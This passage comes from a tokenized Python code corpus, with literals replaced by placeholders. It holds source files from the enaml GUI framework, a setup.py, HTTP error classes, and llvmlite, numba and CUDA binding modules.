super_node ( instance ) <EOL> f_locals = peek_scope ( ) <EOL> scope_key = self . scope_key <EOL> if self . identifier : <EOL> f_locals [ self . identifier ] = instance <EOL> if self . store_locals : <EOL> instance . _d_storage [ scope_key ] = f_locals <EOL> if self . engine is not None : <EOL> instance . _d_engine = self . engine <EOL> if self . closure_keys is not None : <EOL> for key in self . closure_keys : <EOL> instance . _d_storage [ key ] = fetch_scope ( key ) <EOL> if self . child_intercept : <EOL> children_copy = self . children [ : ] <EOL> instance . child_node_intercept ( children_copy , scope_key , f_locals ) <EOL> else : <EOL> for node in self . children : <EOL> node ( instance ) <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def update_id_nodes ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> if self . identifier : <EOL> mapping [ self . identifier ] = self <EOL> super ( DeclarativeNode , self ) . update_id_nodes ( mapping ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( DeclarativeNode , self ) . copy ( ) <EOL> node . klass = self . klass <EOL> node . identifier = self . identifier <EOL> node . store_locals = self . store_locals <EOL> node . child_intercept = self . child_intercept <EOL> if self . engine is not None : <EOL> node . engine = self . engine . copy ( ) <EOL> if self . super_node is not None : <EOL> node . super_node = self . super_node . copy ( ) <EOL> if self . closure_keys is not None : <EOL> node . closure_keys = self . closure_keys . copy ( ) <EOL> return node <EOL> class EnamlDefNode ( DeclarativeNode ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , instance ) : <EOL> """<STR_LIT>""" <EOL> with new_scope ( self . scope_key ) : <EOL> self . populate ( instance ) <EOL> def update_id_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> mapping = sortedmap ( ) <EOL> if self . identifier : <EOL> mapping [ self . identifier ] = self <EOL> super ( DeclarativeNode , self ) . 
update_id_nodes ( mapping ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( EnamlDefNode , self ) . copy ( ) <EOL> node . update_id_nodes ( ) <EOL> return node <EOL> class TemplateNode ( CompilerNode ) : <EOL> """<STR_LIT>""" <EOL> scope = Typed ( sortedmap , ( ) ) <EOL> def __call__ ( self , parent ) : <EOL> """<STR_LIT>""" <EOL> instances = [ ] <EOL> with new_scope ( self . scope_key , self . scope ) : <EOL> for node in self . children : <EOL> if isinstance ( node , DeclarativeNode ) : <EOL> instances . append ( node ( parent ) ) <EOL> elif isinstance ( node , TemplateInstanceNode ) : <EOL> instances . extend ( node ( parent ) ) <EOL> return instances <EOL> def update_id_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TemplateNode , self ) . update_id_nodes ( sortedmap ( ) ) <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return sum ( child . size ( ) for child in self . children ) <EOL> def iternodes ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in self . children : <EOL> if isinstance ( child , DeclarativeNode ) : <EOL> yield child <EOL> elif isinstance ( child , TemplateInstanceNode ) : <EOL> for node in child . iternodes ( ) : <EOL> yield node <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( TemplateNode , self ) . copy ( ) <EOL> node . scope = self . scope <EOL> node . update_id_nodes ( ) <EOL> return node <EOL> class TemplateInstanceNode ( CompilerNode ) : <EOL> """<STR_LIT>""" <EOL> template = Typed ( TemplateNode ) <EOL> names = Tuple ( ) <EOL> starname = Str ( ) <EOL> def __call__ ( self , parent ) : <EOL> """<STR_LIT>""" <EOL> instances = self . template ( parent ) <EOL> f_locals = peek_scope ( ) <EOL> if self . names : <EOL> for name , instance in zip ( self . names , instances ) : <EOL> f_locals [ name ] = instance <EOL> if self . starname : <EOL> f_locals [ self . starname ] = tuple ( instances [ len ( self . 
names ) : ] ) <EOL> return instances <EOL> def update_id_nodes ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> if self . names : <EOL> nodeiter = self . iternodes ( ) <EOL> for name in self . names : <EOL> mapping [ name ] = nodeiter . next ( ) <EOL> super ( TemplateInstanceNode , self ) . update_id_nodes ( mapping ) <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . template . size ( ) <EOL> def iternodes ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . template . iternodes ( ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( TemplateInstanceNode , self ) . copy ( ) <EOL> node . template = self . template . copy ( ) <EOL> node . names = self . names <EOL> node . starname = self . starname <EOL> return node </s>
<s> from . dock_layout import ( <EOL> ItemLayout , TabLayout , SplitLayout , HSplitLayout , VSplitLayout , <EOL> DockBarLayout , AreaLayout , DockLayout , DockLayoutWarning , <EOL> InsertItem , InsertBorderItem , InsertDockBarItem , InsertTab , <EOL> FloatItem , FloatArea , RemoveItem , ExtendItem , RetractItem <EOL> ) <EOL> from . layout_helpers import ( <EOL> align , hbox , vbox , horizontal , vertical , factory , grid , spacer , <EOL> ) <EOL> from . geometry import Box , BoxF , Pos , PosF , Rect , RectF , Size , SizeF </s>
<s> from . import QT_API <EOL> from . QtGui import QFileDialog <EOL> if QT_API == '<STR_LIT>' : <EOL> _STATIC_METHOD_NAMES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> else : <EOL> _STATIC_METHOD_NAMES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get_file_dialog_exec_func ( mode ) : <EOL> """<STR_LIT>""" <EOL> if mode not in _STATIC_METHOD_NAMES : <EOL> raise ValueError ( "<STR_LIT>" % mode ) <EOL> return getattr ( QFileDialog , _STATIC_METHOD_NAMES [ mode ] ) </s>
<s> from atom . api import Typed <EOL> from enaml . widgets . mpl_canvas import ProxyMPLCanvas <EOL> from matplotlib . backends . backend_qt4agg import FigureCanvasQTAgg <EOL> try : <EOL> from matplotlib . backends . backend_qt4agg import ( NavigationToolbar2QTAgg <EOL> as NavigationToolbar2QT ) <EOL> except ImportError : <EOL> from matplotlib . backends . backend_qt4agg import NavigationToolbar2QT <EOL> from . QtCore import Qt <EOL> from . QtGui import QFrame , QVBoxLayout <EOL> from . qt_control import QtControl <EOL> class QtMPLCanvas ( QtControl , ProxyMPLCanvas ) : <EOL> """<STR_LIT>""" <EOL> widget = Typed ( QFrame ) <EOL> def create_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = QFrame ( self . parent_widget ( ) ) <EOL> layout = QVBoxLayout ( ) <EOL> layout . setContentsMargins ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> layout . setSpacing ( <NUM_LIT:0> ) <EOL> widget . setLayout ( layout ) <EOL> self . widget = widget <EOL> def init_layout ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( QtMPLCanvas , self ) . init_layout ( ) <EOL> self . _refresh_mpl_widget ( ) <EOL> def set_figure ( self , figure ) : <EOL> """<STR_LIT>""" <EOL> with self . geometry_guard ( ) : <EOL> self . _refresh_mpl_widget ( ) <EOL> def set_toolbar_visible ( self , visible ) : <EOL> """<STR_LIT>""" <EOL> layout = self . widget . layout ( ) <EOL> if layout . count ( ) == <NUM_LIT:2> : <EOL> with self . geometry_guard ( ) : <EOL> toolbar = layout . itemAt ( <NUM_LIT:0> ) . widget ( ) <EOL> toolbar . setVisible ( visible ) <EOL> def _refresh_mpl_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = self . widget <EOL> layout = widget . layout ( ) <EOL> while layout . count ( ) : <EOL> layout_item = layout . takeAt ( <NUM_LIT:0> ) <EOL> layout_item . widget ( ) . deleteLater ( ) <EOL> figure = self . declaration . figure <EOL> if figure : <EOL> canvas = FigureCanvasQTAgg ( figure ) <EOL> canvas . setParent ( widget ) <EOL> canvas . setFocusPolicy ( Qt . 
ClickFocus ) <EOL> canvas . setVisible ( True ) <EOL> toolbar = NavigationToolbar2QT ( canvas , widget ) <EOL> toolbar . setVisible ( self . declaration . toolbar_visible ) <EOL> layout . addWidget ( toolbar ) <EOL> layout . addWidget ( canvas ) </s>
<s> from datetime import datetime , time as pytime <EOL> from atom . api import Typed , ForwardTyped , observe <EOL> from enaml . core . declarative import d_ <EOL> from . control import Control , ProxyControl <EOL> class ProxyBoundedTime ( ProxyControl ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : BoundedTime ) <EOL> def set_minimum ( self , minimum ) : <EOL> raise NotImplementedError <EOL> def set_maximum ( self , maximum ) : <EOL> raise NotImplementedError <EOL> def set_time ( self , time ) : <EOL> raise NotImplementedError <EOL> class BoundedTime ( Control ) : <EOL> """<STR_LIT>""" <EOL> minimum = d_ ( Typed ( pytime , args = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> maximum = d_ ( Typed ( pytime , args = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) ) <EOL> time = d_ ( Typed ( pytime , factory = lambda : datetime . now ( ) . time ( ) ) ) <EOL> proxy = Typed ( ProxyBoundedTime ) <EOL> @ observe ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( BoundedTime , self ) . _update_proxy ( change ) <EOL> def _post_setattr_minimum ( self , old , new ) : <EOL> """<STR_LIT>""" <EOL> if new > self . maximum : <EOL> self . maximum = new <EOL> if new > self . time : <EOL> self . time = new <EOL> def _post_setattr_maximum ( self , old , new ) : <EOL> """<STR_LIT>""" <EOL> if new < self . minimum : <EOL> self . minimum = new <EOL> if new < self . time : <EOL> self . time = new <EOL> def _post_validate_time ( self , old , new ) : <EOL> """<STR_LIT>""" <EOL> return max ( self . minimum , min ( new , self . maximum ) ) </s>
<s> from atom . api import Bool , Typed , ForwardTyped , Unicode , observe <EOL> from enaml . core . declarative import d_ <EOL> from . action import Action <EOL> from . action_group import ActionGroup <EOL> from . toolkit_object import ToolkitObject , ProxyToolkitObject <EOL> class ProxyMenu ( ProxyToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : Menu ) <EOL> def set_title ( self , title ) : <EOL> raise NotImplementedError <EOL> def set_enabled ( self , enabled ) : <EOL> raise NotImplementedError <EOL> def set_visible ( self , visible ) : <EOL> raise NotImplementedError <EOL> def set_context_menu ( self , context ) : <EOL> raise NotImplementedError <EOL> def popup ( self ) : <EOL> raise NotImplementedError <EOL> def close ( self ) : <EOL> raise NotImplementedError <EOL> class Menu ( ToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> title = d_ ( Unicode ( ) ) <EOL> enabled = d_ ( Bool ( True ) ) <EOL> visible = d_ ( Bool ( True ) ) <EOL> context_menu = d_ ( Bool ( False ) ) <EOL> proxy = Typed ( ProxyMenu ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> allowed = ( Action , ActionGroup , Menu ) <EOL> return [ c for c in self . children if isinstance ( c , allowed ) ] <EOL> @ observe ( '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( Menu , self ) . _update_proxy ( change ) <EOL> def popup ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_initialized : <EOL> self . initialize ( ) <EOL> if not self . proxy_is_active : <EOL> self . activate_proxy ( ) <EOL> self . proxy . popup ( ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . proxy_is_active : <EOL> self . proxy . close ( ) </s>
<s> from . extension import Extension <EOL> from . extension_point import ExtensionPoint <EOL> from . plugin import Plugin <EOL> from . plugin_manifest import PluginManifest <EOL> from . workbench import Workbench </s>
<s> import sys <EOL> from setuptools import setup , find_packages , Extension <EOL> ext_modules = [ <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) <EOL> ] <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> ext_modules . append ( <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> libraries = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' <EOL> ) <EOL> ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = find_packages ( ) , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> entry_points = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> ext_modules = ext_modules , <EOL> ) </s>
<s> from . data import STATUSES <EOL> class PycnicError ( Exception ) : <EOL> pass <EOL> class HTTPError ( PycnicError ) : <EOL> status_code = <NUM_LIT:0> <EOL> status = None <EOL> message = None <EOL> data = None <EOL> def __init__ ( self , status_code , message , data = None ) : <EOL> if self . status_code : <EOL> status_code = self . status_code <EOL> self . status_code = status_code <EOL> self . status = STATUSES [ status_code ] <EOL> self . message = message <EOL> self . data = data <EOL> def response ( self ) : <EOL> return { <EOL> "<STR_LIT:status>" : self . status , <EOL> "<STR_LIT>" : self . status_code , <EOL> "<STR_LIT:error>" : self . message , <EOL> "<STR_LIT:data>" : self . data <EOL> } <EOL> class HTTPNumeric ( HTTPError ) : <EOL> status_code = <NUM_LIT:0> <EOL> def __init__ ( self , message , data = None ) : <EOL> super ( HTTPError , self ) . __init__ ( self . status_code , message , data ) <EOL> self . status = STATUSES [ self . status_code ] <EOL> self . message = message <EOL> self . data = data <EOL> class HTTP_400 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_401 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_403 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_404 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_405 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_408 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> <EOL> class HTTP_500 ( HTTPNumeric ) : <EOL> status_code = <NUM_LIT> </s>
<s> from llvmlite import binding as llvm <EOL> from llvmlite import ir as lc <EOL> llvm . initialize ( ) <EOL> llvm . initialize_native_target ( ) <EOL> llvm . initialize_native_asmprinter ( ) <EOL> mod = lc . Module ( ) <EOL> mod . triple = llvm . get_default_triple ( ) <EOL> func = lc . Function ( mod , lc . FunctionType ( lc . VoidType ( ) , [ lc . IntType ( <NUM_LIT:32> ) ] ) , <EOL> name = '<STR_LIT:foo>' ) <EOL> builder = lc . IRBuilder ( func . append_basic_block ( ) ) <EOL> builder . ret_void ( ) <EOL> print ( mod ) <EOL> mod = llvm . parse_assembly ( str ( mod ) ) <EOL> mod . verify ( ) <EOL> print ( repr ( mod ) ) <EOL> print ( mod ) <EOL> with llvm . create_module_pass_manager ( ) as pm : <EOL> with llvm . create_pass_manager_builder ( ) as pmb : <EOL> pmb . populate ( pm ) <EOL> pm . run ( mod ) <EOL> print ( mod ) <EOL> tm = llvm . Target . from_default_triple ( ) . create_target_machine ( ) <EOL> ee = llvm . create_mcjit_compiler ( mod , tm ) <EOL> func = mod . get_function ( "<STR_LIT:foo>" ) <EOL> print ( func , ee . get_function_address ( "<STR_LIT:foo>" ) ) <EOL> ee . close ( ) <EOL> llvm . shutdown ( ) </s>
<s> import itertools <EOL> from llvmlite import ir <EOL> from llvmlite import binding as llvm <EOL> CallOrInvokeInstruction = ir . CallInstr <EOL> class LLVMException ( Exception ) : <EOL> pass <EOL> _icmp_ct = itertools . count ( ) <EOL> _icmp_get = lambda : next ( _icmp_ct ) <EOL> ICMP_EQ = _icmp_get ( ) <EOL> ICMP_NE = _icmp_get ( ) <EOL> ICMP_SLT = _icmp_get ( ) <EOL> ICMP_SLE = _icmp_get ( ) <EOL> ICMP_SGT = _icmp_get ( ) <EOL> ICMP_SGE = _icmp_get ( ) <EOL> ICMP_ULT = _icmp_get ( ) <EOL> ICMP_ULE = _icmp_get ( ) <EOL> ICMP_UGT = _icmp_get ( ) <EOL> ICMP_UGE = _icmp_get ( ) <EOL> FCMP_OEQ = _icmp_get ( ) <EOL> FCMP_OGT = _icmp_get ( ) <EOL> FCMP_OGE = _icmp_get ( ) <EOL> FCMP_OLT = _icmp_get ( ) <EOL> FCMP_OLE = _icmp_get ( ) <EOL> FCMP_ONE = _icmp_get ( ) <EOL> FCMP_ORD = _icmp_get ( ) <EOL> FCMP_UEQ = _icmp_get ( ) <EOL> FCMP_UGT = _icmp_get ( ) <EOL> FCMP_UGE = _icmp_get ( ) <EOL> FCMP_ULT = _icmp_get ( ) <EOL> FCMP_ULE = _icmp_get ( ) <EOL> FCMP_UNE = _icmp_get ( ) <EOL> FCMP_UNO = _icmp_get ( ) <EOL> INTR_FABS = "<STR_LIT>" <EOL> INTR_EXP = "<STR_LIT>" <EOL> INTR_LOG = "<STR_LIT>" <EOL> INTR_LOG10 = "<STR_LIT>" <EOL> INTR_SIN = "<STR_LIT>" <EOL> INTR_COS = "<STR_LIT>" <EOL> INTR_POWI = '<STR_LIT>' <EOL> INTR_POW = '<STR_LIT>' <EOL> INTR_FLOOR = '<STR_LIT>' <EOL> LINKAGE_EXTERNAL = '<STR_LIT>' <EOL> LINKAGE_INTERNAL = '<STR_LIT>' <EOL> LINKAGE_LINKONCE_ODR = '<STR_LIT>' <EOL> ATTR_NO_CAPTURE = '<STR_LIT>' <EOL> class Type ( object ) : <EOL> @ staticmethod <EOL> def int ( width = <NUM_LIT:32> ) : <EOL> return ir . IntType ( width ) <EOL> @ staticmethod <EOL> def float ( ) : <EOL> return ir . FloatType ( ) <EOL> @ staticmethod <EOL> def double ( ) : <EOL> return ir . DoubleType ( ) <EOL> @ staticmethod <EOL> def pointer ( ty , addrspace = <NUM_LIT:0> ) : <EOL> return ir . PointerType ( ty , addrspace ) <EOL> @ staticmethod <EOL> def function ( res , args , var_arg = False ) : <EOL> return ir . 
FunctionType ( res , args , var_arg = var_arg ) <EOL> @ staticmethod <EOL> def struct ( members ) : <EOL> return ir . LiteralStructType ( members ) <EOL> @ staticmethod <EOL> def array ( element , count ) : <EOL> return ir . ArrayType ( element , count ) <EOL> @ staticmethod <EOL> def void ( ) : <EOL> return ir . VoidType ( ) <EOL> class Constant ( object ) : <EOL> @ staticmethod <EOL> def all_ones ( ty ) : <EOL> if isinstance ( ty , ir . IntType ) : <EOL> return Constant . int ( ty , int ( '<STR_LIT:1>' * ty . width , <NUM_LIT:2> ) ) <EOL> else : <EOL> raise NotImplementedError ( ty ) <EOL> @ staticmethod <EOL> def int ( ty , n ) : <EOL> return ir . Constant ( ty , n ) <EOL> @ staticmethod <EOL> def int_signextend ( ty , n ) : <EOL> return ir . Constant ( ty , n ) <EOL> @ staticmethod <EOL> def real ( ty , n ) : <EOL> return ir . Constant ( ty , n ) <EOL> @ staticmethod <EOL> def struct ( elems ) : <EOL> return ir . Constant . literal_struct ( elems ) <EOL> @ staticmethod <EOL> def null ( ty ) : <EOL> return ir . Constant ( ty , None ) <EOL> @ staticmethod <EOL> def undef ( ty ) : <EOL> return ir . Constant ( ty , ir . Undefined ) <EOL> @ staticmethod <EOL> def stringz ( string ) : <EOL> n = ( len ( string ) + <NUM_LIT:1> ) <EOL> buf = bytearray ( ( '<STR_LIT:U+0020>' * n ) . encode ( '<STR_LIT:ascii>' ) ) <EOL> buf [ - <NUM_LIT:1> ] = <NUM_LIT:0> <EOL> buf [ : - <NUM_LIT:1> ] = string . encode ( '<STR_LIT:utf-8>' ) <EOL> return ir . Constant ( ir . ArrayType ( ir . IntType ( <NUM_LIT:8> ) , n ) , buf ) <EOL> @ staticmethod <EOL> def array ( typ , val ) : <EOL> return ir . Constant ( ir . ArrayType ( typ , len ( val ) ) , val ) <EOL> @ staticmethod <EOL> def bitcast ( const , typ ) : <EOL> return const . bitcast ( typ ) <EOL> @ staticmethod <EOL> def inttoptr ( const , typ ) : <EOL> return const . inttoptr ( typ ) <EOL> @ staticmethod <EOL> def gep ( const , indices ) : <EOL> return const . gep ( indices ) <EOL> class Module ( ir . 
Module ) : <EOL> def get_or_insert_function ( self , fnty , name ) : <EOL> if name in self . globals : <EOL> return self . globals [ name ] <EOL> else : <EOL> return ir . Function ( self , fnty , name ) <EOL> def verify ( self ) : <EOL> llvm . parse_assembly ( str ( self ) ) <EOL> def add_function ( self , fnty , name ) : <EOL> return ir . Function ( self , fnty , name ) <EOL> def add_global_variable ( self , ty , name , addrspace = <NUM_LIT:0> ) : <EOL> return ir . GlobalVariable ( self , ty , self . get_unique_name ( name ) , <EOL> addrspace ) <EOL> def get_global_variable_named ( self , name ) : <EOL> try : <EOL> return self . globals [ name ] <EOL> except KeyError : <EOL> raise LLVMException ( name ) <EOL> def get_or_insert_named_metadata ( self , name ) : <EOL> try : <EOL> return self . get_named_metadata ( name ) <EOL> except KeyError : <EOL> return self . add_named_metadata ( name ) <EOL> class Function ( ir . Function ) : <EOL> @ classmethod <EOL> def new ( cls , module_obj , functy , name = '<STR_LIT>' ) : <EOL> return cls ( module_obj , functy , name ) <EOL> @ staticmethod <EOL> def intrinsic ( module , intrinsic , tys ) : <EOL> return module . 
declare_intrinsic ( intrinsic , tys ) <EOL> _icmp_umap = { <EOL> ICMP_EQ : '<STR_LIT>' , <EOL> ICMP_NE : '<STR_LIT>' , <EOL> ICMP_ULT : '<STR_LIT:<>' , <EOL> ICMP_ULE : '<STR_LIT>' , <EOL> ICMP_UGT : '<STR_LIT:>>' , <EOL> ICMP_UGE : '<STR_LIT>' , <EOL> } <EOL> _icmp_smap = { <EOL> ICMP_SLT : '<STR_LIT:<>' , <EOL> ICMP_SLE : '<STR_LIT>' , <EOL> ICMP_SGT : '<STR_LIT:>>' , <EOL> ICMP_SGE : '<STR_LIT>' , <EOL> } <EOL> _fcmp_omap = { <EOL> FCMP_OEQ : '<STR_LIT>' , <EOL> FCMP_OGT : '<STR_LIT:>>' , <EOL> FCMP_OGE : '<STR_LIT>' , <EOL> FCMP_OLT : '<STR_LIT:<>' , <EOL> FCMP_OLE : '<STR_LIT>' , <EOL> FCMP_ONE : '<STR_LIT>' , <EOL> FCMP_ORD : '<STR_LIT>' , <EOL> } <EOL> _fcmp_umap = { <EOL> FCMP_UEQ : '<STR_LIT>' , <EOL> FCMP_UGT : '<STR_LIT:>>' , <EOL> FCMP_UGE : '<STR_LIT>' , <EOL> FCMP_ULT : '<STR_LIT:<>' , <EOL> FCMP_ULE : '<STR_LIT>' , <EOL> FCMP_UNE : '<STR_LIT>' , <EOL> FCMP_UNO : '<STR_LIT>' , <EOL> } <EOL> class Builder ( ir . IRBuilder ) : <EOL> def icmp ( self , pred , lhs , rhs , name = '<STR_LIT>' ) : <EOL> if pred in _icmp_umap : <EOL> return self . icmp_unsigned ( _icmp_umap [ pred ] , lhs , rhs , name = name ) <EOL> else : <EOL> return self . icmp_signed ( _icmp_smap [ pred ] , lhs , rhs , name = name ) <EOL> def fcmp ( self , pred , lhs , rhs , name = '<STR_LIT>' ) : <EOL> if pred in _fcmp_umap : <EOL> return self . fcmp_unordered ( _fcmp_umap [ pred ] , lhs , rhs , name = name ) <EOL> else : <EOL> return self . fcmp_ordered ( _fcmp_omap [ pred ] , lhs , rhs , name = name ) <EOL> class MetaDataString ( ir . MetaDataString ) : <EOL> @ staticmethod <EOL> def get ( module , text ) : <EOL> return MetaDataString ( module , text ) <EOL> class MetaData ( ir . MetaData ) : <EOL> @ staticmethod <EOL> def get ( module , values ) : <EOL> return module . add_metadata ( values ) <EOL> class InlineAsm ( ir . InlineAsm ) : <EOL> @ staticmethod <EOL> def get ( * args , ** kwargs ) : <EOL> return InlineAsm ( * args , ** kwargs ) </s>
<s> from numba import exportmany , export <EOL> def mult ( a , b ) : <EOL> return a * b <EOL> export ( '<STR_LIT>' ) ( mult ) <EOL> exportmany ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ( mult ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> from numba import double <EOL> from numba . decorators import jit as jit <EOL> def sum2d ( arr ) : <EOL> M , N = arr . shape <EOL> result = <NUM_LIT:0.0> <EOL> for i in range ( M ) : <EOL> for j in range ( N ) : <EOL> result += arr [ i , j ] <EOL> return result <EOL> jitsum2d = jit ( sum2d ) <EOL> csum2d = jitsum2d . compile ( double ( double [ : , : : <NUM_LIT:1> ] ) ) <EOL> from numpy import random <EOL> arr = random . randn ( <NUM_LIT:100> , <NUM_LIT:100> ) <EOL> import time <EOL> start = time . time ( ) <EOL> res = sum2d ( arr ) <EOL> duration = time . time ( ) - start <EOL> print ( "<STR_LIT>" % ( res , duration * <NUM_LIT:1000> ) ) <EOL> csum2d ( arr ) <EOL> start = time . time ( ) <EOL> res = csum2d ( arr ) <EOL> duration2 = time . time ( ) - start <EOL> print ( "<STR_LIT>" % ( res , duration2 * <NUM_LIT:1000> ) ) <EOL> print ( "<STR_LIT>" % ( duration / duration2 ) ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> from ctypes import * <EOL> cu_device = c_int <EOL> cu_device_attribute = c_int <EOL> cu_context = c_void_p <EOL> cu_module = c_void_p <EOL> cu_jit_option = c_int <EOL> cu_jit_input_type = c_int <EOL> cu_function = c_void_p <EOL> cu_device_ptr = c_size_t <EOL> cu_stream = c_void_p <EOL> cu_event = c_void_p <EOL> cu_link_state = c_void_p <EOL> cu_function_attribute = c_int <EOL> cu_occupancy_b2d_size = CFUNCTYPE ( c_size_t , c_int ) <EOL> API_PROTOTYPES = { <EOL> '<STR_LIT>' : ( c_int , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device ) , c_int ) , <EOL> '<STR_LIT>' : ( c_int , c_char_p , c_int , cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) , cu_device_attribute , <EOL> cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( c_int ) , POINTER ( c_int ) , <EOL> cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_context ) , c_uint , cu_device ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device ) ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_context ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_context ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_context ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_context ) , <EOL> '<STR_LIT>' : ( c_int , cu_module , c_void_p , c_uint , <EOL> POINTER ( cu_jit_option ) , POINTER ( c_void_p ) ) , <EOL> '<STR_LIT>' : ( c_int , cu_module ) , <EOL> '<STR_LIT>' : ( c_int , cu_function , cu_module , c_char_p ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device_ptr ) , POINTER ( c_size_t ) , <EOL> cu_module , c_char_p ) , <EOL> '<STR_LIT>' : ( c_int , cu_function , c_uint ) , <EOL> '<STR_LIT>' : ( c_int , POINTER ( cu_device_ptr ) , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , cu_device_ptr , c_uint8 , c_size_t ) , <EOL> '<STR_LIT>' : ( c_int , <EOL> cu_device_ptr , c_uint8 , c_size_t , cu_stream ) , <EOL> '<STR_LIT>' : ( c_int , 
